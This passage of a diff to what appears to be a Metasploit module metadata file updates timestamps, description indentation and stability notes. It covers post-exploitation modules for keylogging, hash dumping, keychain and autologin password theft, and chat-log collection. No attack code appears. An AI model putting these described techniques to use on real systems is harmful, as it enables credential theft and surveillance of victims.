-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/thunderbird_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/thunderbird_creds",
@@ -209564,7 +211975,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/tomcat_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/tomcat_gather",
@@ -209592,7 +212003,7 @@
      "zhangyoufu",
      "justingist"
    ],
-    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n        and downloads the backup and autobackup files.  The files are then decrypted using\n        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n        used due to the large file sizes, which can be flaky on regular shells to read.\n        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n        If the zip can be repaired, the db and its information will be extracted.",
+    "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n          and downloads the backup and autobackup files.  The files are then decrypted using\n          a known encryption key, then attempted to be repaired by zip.  Meterpreter must be\n          used due to the large file sizes, which can be flaky on regular shells to read.\n          Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n          If the zip can be repaired, the db and its information will be extracted.",
    "references": [
      "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/",
      "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1",
@@ -209605,7 +212016,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-21 11:00:25 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/ubiquiti_unifi_backup",
@@ -209641,7 +212052,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-05-04 11:31:11 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/multi/gather/unix_cached_ad_hashes.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/unix_cached_ad_hashes",
@@ -209649,6 +212060,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
@@ -209678,7 +212098,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-05-04 11:34:22 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/multi/gather/unix_kerberos_tickets.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/unix_kerberos_tickets",
@@ -209686,6 +212106,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
@@ -209715,7 +212144,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/gather/wlan_geolocate.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/wlan_geolocate",
@@ -209752,7 +212181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/general/close.rb",
    "is_install_path": true,
    "ref_name": "multi/general/close",
@@ -209789,7 +212218,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/general/execute.rb",
    "is_install_path": true,
    "ref_name": "multi/general/execute",
@@ -209826,7 +212255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/general/wall.rb",
    "is_install_path": true,
    "ref_name": "multi/general/wall",
@@ -209864,7 +212293,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/autoroute.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/autoroute",
@@ -209900,7 +212329,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/dbvis_add_db_admin",
@@ -209936,7 +212365,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/dbvis_query.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/dbvis_query",
@@ -210009,7 +212438,7 @@
    "author": [
      "Sheila A. Berta (UnaPibaGeek)"
    ],
-    "description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n        Google Chrome, Opera, Safari and wget.",
+    "description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n          Google Chrome, Opera, Safari and wget.",
    "references": [
      "URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html",
      "URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf"
@@ -210020,7 +212449,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-03 02:18:30 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/hsts_eraser.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/hsts_eraser",
@@ -210047,7 +212476,7 @@
    "author": [
      "carlos_perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will execute a list of modules given in a macro file in the format\n            of <module> <opt=val,opt=val> against the select session checking for compatibility\n            of the module against the sessions and validation of the options provided.",
+    "description": "This module will execute a list of modules given in a macro file in the format\n          of <module> <opt=val,opt=val> against the select session checking for compatibility\n          of the module against the sessions and validation of the options provided.",
    "references": [

    ],
@@ -210057,7 +212486,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-12-23 11:36:38 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/multi_post.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/multi_post",
@@ -210084,7 +212513,7 @@
    "author": [
      "Eliott Teissonniere"
    ],
-    "description": "This module will open any file or URL specified with the URI format on the\n        target computer via the embedded commands such as 'open' or 'xdg-open'.",
+    "description": "This module will open any file or URL specified with the URI format on the\n          target computer via the embedded commands such as 'open' or 'xdg-open'.",
    "references": [

    ],
@@ -210094,7 +212523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-06-21 16:46:15 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/open.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/open",
@@ -210131,7 +212560,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/play_youtube.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/play_youtube",
@@ -210173,7 +212602,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/record_mic.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/record_mic",
@@ -210199,7 +212628,7 @@
    "author": [
      "Eliott Teissonniere"
    ],
-    "description": "This module allows you to turn on or off the screensaver of the target computer and also\n        lock the current session.",
+    "description": "This module allows you to turn on or off the screensaver of the target computer and also\n          lock the current session.",
    "references": [

    ],
@@ -210209,7 +212638,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-06-21 16:46:00 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/screensaver.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/screensaver",
@@ -210291,7 +212720,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/set_wallpaper.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/set_wallpaper",
@@ -210327,7 +212756,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-27 10:21:59 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/shell_to_meterpreter.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/shell_to_meterpreter",
@@ -210365,7 +212794,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-20 12:44:29 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/sudo.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/sudo",
@@ -210401,7 +212830,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-22 13:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/system_session.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/system_session",
@@ -210438,7 +212867,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-10-02 21:33:01 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/upload_exec",
@@ -210475,7 +212904,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/manage/zip.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/zip",
@@ -210503,7 +212932,7 @@
      "sinn3r <sinn3r@metasploit.com>",
      "Mo"
    ],
-    "description": "This module suggests local meterpreter exploits that can be used.\n\n        The exploits are suggested based on the architecture and platform\n        that the user has a shell opened as well as the available exploits\n        in meterpreter.\n\n        It's important to note that not all local exploits will be fired.\n        Exploits are chosen based on these conditions: session type,\n        platform, architecture, and required default options.",
+    "description": "This module suggests local meterpreter exploits that can be used.\n\n          The exploits are suggested based on the architecture and platform\n          that the user has a shell opened as well as the available exploits\n          in meterpreter.\n\n          It's important to note that not all local exploits will be fired.\n          Exploits are chosen based on these conditions: session type,\n          platform, architecture, and required default options.",
    "references": [

    ],
@@ -210513,7 +212942,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-25 10:25:32 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/local_exploit_suggester",
@@ -210550,7 +212979,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/multi/recon/multiport_egress_traffic.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/multiport_egress_traffic",
@@ -210673,7 +213102,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/multi/sap/smdagent_get_properties.rb",
    "is_install_path": true,
    "ref_name": "multi/sap/smdagent_get_properties",
@@ -210681,6 +213110,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
@@ -210710,7 +213148,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/networking/gather/enum_brocade.rb",
    "is_install_path": true,
    "ref_name": "networking/gather/enum_brocade",
@@ -210746,7 +213184,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-05-13 04:01:03 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/networking/gather/enum_cisco.rb",
    "is_install_path": true,
    "ref_name": "networking/gather/enum_cisco",
@@ -210754,6 +213192,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell"
@@ -210782,7 +213229,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/networking/gather/enum_f5.rb",
    "is_install_path": true,
    "ref_name": "networking/gather/enum_f5",
@@ -210790,6 +213237,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell"
@@ -210818,7 +213274,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/networking/gather/enum_juniper.rb",
    "is_install_path": true,
    "ref_name": "networking/gather/enum_juniper",
@@ -210854,7 +213310,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-16 13:56:50 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/networking/gather/enum_mikrotik.rb",
    "is_install_path": true,
    "ref_name": "networking/gather/enum_mikrotik",
@@ -210862,6 +213318,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell"
@@ -210890,7 +213355,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-12-07 11:02:10 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/networking/gather/enum_vyos.rb",
    "is_install_path": true,
    "ref_name": "networking/gather/enum_vyos",
@@ -210898,6 +213363,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "shell"
@@ -210926,7 +213400,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/admin/say.rb",
    "is_install_path": true,
    "ref_name": "osx/admin/say",
@@ -210953,7 +213427,7 @@
    "author": [
      "joev <joev@metasploit.com>"
    ],
-    "description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n        Keylogs are transferred between client/server in chunks\n        every SYNCWAIT seconds for reliability.\n\n        Works by calling the Carbon GetKeys() hook using the DL lib\n        in OSX's system Ruby. The Ruby code is executed in a shell\n        command using -e, so the payload never hits the disk.",
+    "description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n          Keylogs are transferred between client/server in chunks\n          every SYNCWAIT seconds for reliability.\n\n          Works by calling the Carbon GetKeys() hook using the DL lib\n          in OSX's system Ruby. The Ruby code is executed in a shell\n          command using -e, so the payload never hits the disk.",
    "references": [

    ],
@@ -210963,7 +213437,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-04-15 21:01:05 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/capture/keylog_recorder.rb",
    "is_install_path": true,
    "ref_name": "osx/capture/keylog_recorder",
@@ -211000,7 +213474,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/capture/screen.rb",
    "is_install_path": true,
    "ref_name": "osx/capture/screen",
@@ -211040,7 +213514,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/osx/escalate/tccbypass.rb",
    "is_install_path": true,
    "ref_name": "osx/escalate/tccbypass",
@@ -211048,9 +213522,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
      "SideEffects": [
+        "config-changes",
        "artifacts-on-disk",
        "screen-effects"
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": [
@@ -211072,7 +213553,7 @@
      "Sarah Edwards",
      "cbrnrd"
    ],
-    "description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n        that discloses the passwords of encrypted APFS volumes.\n\n        In OSX a normal user can use the 'log' command to view the system\n        logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n        volume the password is visible in plaintext within these logs.",
+    "description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n          that discloses the passwords of encrypted APFS volumes.\n\n          In OSX a normal user can use the 'log' command to view the system\n          logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n          volume the password is visible in plaintext within these logs.",
    "references": [
      "URL-https://thehackernews.com/2018/03/macos-apfs-password.html",
      "URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp"
@@ -211083,7 +213564,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/apfs_encrypted_volume_passwd",
@@ -211110,7 +213591,7 @@
    "author": [
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module will steal the plaintext password of any user on the machine\n        with autologin enabled. Root access is required.\n\n        When a user has autologin enabled (System Preferences -> Accounts), OSX\n        stores their password with an XOR encoding in /private/etc/kcpassword.",
+    "description": "This module will steal the plaintext password of any user on the machine\n          with autologin enabled. Root access is required.\n\n          When a user has autologin enabled (System Preferences -> Accounts), OSX\n          stores their password with an XOR encoding in /private/etc/kcpassword.",
    "references": [
      "URL-http://www.brock-family.org/gavin/perl/kcpassword.html"
    ],
@@ -211120,7 +213601,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-05-22 22:25:39 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/autologin_password.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/autologin_password",
@@ -211147,7 +213628,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module will collect Adium's account plist files and chat logs from the\n        victim's machine.  There are three different actions you may choose: ACCOUNTS,\n        CHATS, and ALL.  Note that to use the 'CHATS' action, make sure you set the regex\n        'PATTERN' option in order to look for certain log names (which consists of a\n        contact's name, and a timestamp).  The current 'PATTERN' option is configured to\n        look for any log created on February 2012 as an example.  To loot both account\n        plists and chat logs, simply set the action to 'ALL'.",
+    "description": "This module will collect Adium's account plist files and chat logs from the\n          victim's machine.  There are three different actions you may choose: ACCOUNTS,\n          CHATS, and ALL.  Note that to use the 'CHATS' action, make sure you set the regex\n          'PATTERN' option in order to look for certain log names (which consists of a\n          contact's name, and a timestamp).  The current 'PATTERN' option is configured to\n          look for any log created on February 2012 as an example.  To loot both account\n          plists and chat logs, simply set the action to 'ALL'.",
    "references": [

    ],
@@ -211157,7 +213638,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_adium.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_adium",
@@ -211184,7 +213665,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module will download OS X Airport Wireless preferences from the victim\n        machine.  The preferences file (which is a plist) contains information such as:\n        SSID, Channels, Security Type, Password ID, etc.",
+    "description": "This module will download OS X Airport Wireless preferences from the victim\n          machine.  The preferences file (which is a plist) contains information such as:\n          SSID, Channels, Security Type, Password ID, etc.",
    "references": [

    ],
@@ -211194,7 +213675,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_airport.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_airport",
@@ -211221,7 +213702,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module will download the \"Chicken of the VNC\" client application's\n        profile file,\twhich is used to store other VNC servers' information such\n        as the IP and password.",
+    "description": "This module will download the \"Chicken of the VNC\" client application's\n          profile file,\twhich is used to store other VNC servers' information such\n          as the IP and password.",
    "references": [

    ],
@@ -211231,7 +213712,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_chicken_vnc_profile",
@@ -211258,7 +213739,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module will collect Colloquy's info plist file and chat logs from the\n        victim's machine.  There are three actions you may choose:  INFO, CHATS, and\n        ALL.  Please note that the CHAT action may take a long time depending on the\n        victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n        to search for certain log names (which consists of the contact's name, and a\n        timestamp).  The default 'PATTERN' is configured as \"^alien\" as an example\n        to search for any chat logs associated with the name \"alien\".",
+    "description": "This module will collect Colloquy's info plist file and chat logs from the\n          victim's machine.  There are three actions you may choose:  INFO, CHATS, and\n          ALL.  Please note that the CHAT action may take a long time depending on the\n          victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n          to search for certain log names (which consists of the contact's name, and a\n          timestamp).  The default 'PATTERN' is configured as \"^alien\" as an example\n          to search for any chat logs associated with the name \"alien\".",
    "references": [

    ],
@@ -211268,7 +213749,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_colloquy.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_colloquy",
@@ -211296,7 +213777,7 @@
      "ipwnstuff <e@ipwnstuff.com>",
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module presents a way to quickly go through the current user's keychains and\n        collect data such as email accounts, servers, and other services.  Please note:\n        when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n        alert flash briefly on their screen that gets dismissed by a programmatically triggered click.",
+    "description": "This module presents a way to quickly go through the current user's keychains and\n          collect data such as email accounts, servers, and other services.  Please note:\n          when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n          alert flash briefly on their screen that gets dismissed by a programmatically triggered click.",
    "references": [

    ],
@@ -211306,7 +213787,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_keychain.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_keychain",
@@ -211333,7 +213814,7 @@
    "author": [
      "Geckom <geckom@redteamr.com>"
    ],
-    "description": "This module will collect the Messages sqlite3 database files and chat logs\n        from the victim's machine. There are four actions you may choose: DBFILE,\n        READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n        LATEST will retrieve the last X number of messages (useful with 2FA). Module\n        was tested with OS X 10.11 (El Capitan).",
+    "description": "This module will collect the Messages sqlite3 database files and chat logs\n          from the victim's machine. There are four actions you may choose: DBFILE,\n          READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n          LATEST will retrieve the last X number of messages (useful with 2FA). Module\n          was tested with OS X 10.11 (El Capitan).",
    "references": [

    ],
@@ -211343,7 +213824,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_messages.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_messages",
@@ -211370,7 +213851,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n            Mojave (10.14).",
+    "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n          Mojave (10.14).",
    "references": [

    ],
@@ -211380,7 +213861,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/enum_osx.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/enum_osx",
@@ -211417,7 +213898,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-04-14 17:47:19 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/osx/gather/gitignore.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/gitignore",
@@ -211425,6 +213906,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
@@ -211446,7 +213936,7 @@
      "hammackj <jacob.hammack@hammackj.com>",
      "joev <joev@metasploit.com>"
    ],
-    "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n            versions 10.3 to 10.14.",
+    "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n          versions 10.3 to 10.14.",
    "references": [

    ],
@@ -211456,7 +213946,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-20 13:11:24 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/hashdump",
@@ -211495,7 +213985,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-02-13 16:17:33 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/osx/gather/password_prompt_spoof.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/password_prompt_spoof",
@@ -211522,7 +214012,7 @@
    "author": [
      "sinn3r <sinn3r@metasploit.com>"
    ],
-    "description": "This module downloads the LastSession.plist file from the target machine.\n        LastSession.plist is used by Safari to track active websites in the current session,\n        and sometimes contains sensitive information such as usernames and passwords.\n\n        This module will first download the original LastSession.plist, and then attempt\n        to find the credential for Gmail. The Gmail's last session state may contain the\n        user's credential if his/her first login attempt failed (likely due to a typo),\n        and then the page got refreshed or another login attempt was made. This also means\n        the stolen credential might contain typos.",
+    "description": "This module downloads the LastSession.plist file from the target machine.\n          LastSession.plist is used by Safari to track active websites in the current session,\n          and sometimes contains sensitive information such as usernames and passwords.\n\n          This module will first download the original LastSession.plist, and then attempt\n          to find the credential for Gmail. The Gmail's last session state may contain the\n          user's credential if his/her first login attempt failed (likely due to a typo),\n          and then the page got refreshed or another login attempt was made. This also means\n          the stolen credential might contain typos.",
    "references": [
      "URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari"
    ],
@@ -211532,7 +214022,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
